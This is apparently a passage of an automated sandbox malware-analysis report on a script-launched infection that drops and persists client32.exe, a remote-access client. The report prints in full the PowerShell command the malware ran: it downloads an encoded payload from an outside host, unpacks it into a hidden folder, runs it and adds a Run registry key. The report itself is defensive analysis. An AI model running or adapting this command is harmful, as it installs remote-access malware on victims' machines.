                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp

                                Data Obfuscation

                                barindex
                                Found suspicious powershell code related to unpacking or dynamic code loading
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Conta
                                Suspicious powershell command line found
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,3_2_11029BB0
                                Source: PCICL32.DLL.1.drStatic PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B92097D push E95B71D0h; ret 1_2_00007FFD9B9209C9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B927567 push ebx; iretd 1_2_00007FFD9B92756A
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11041721 push 3BFFFFFEh; ret 3_2_11041726
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1116FF15 push ecx; ret 3_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11041721 push 3BFFFFFEh; ret 7_2_11041726
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1116FF15 push ecx; ret 7_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1116AE09 push ecx; ret 7_2_1116AE1C
                                Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,7_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HQWQTOJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HQWQTOJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,3_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,3_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11113380 IsIconic,GetTickCount,3_2_11113380
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,3_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,3_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,3_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,3_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,3_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,3_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,3_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,3_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,3_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,3_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,3_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,7_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11113380 IsIconic,GetTickCount,7_2_11113380
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,7_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,7_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,7_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,7_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,7_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,7_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,7_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11024880
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,3_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Delayed program exit found
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110B86C0 Sleep,ExitProcess,3_2_110B86C0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110B86C0 Sleep,ExitProcess,7_2_110B86C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
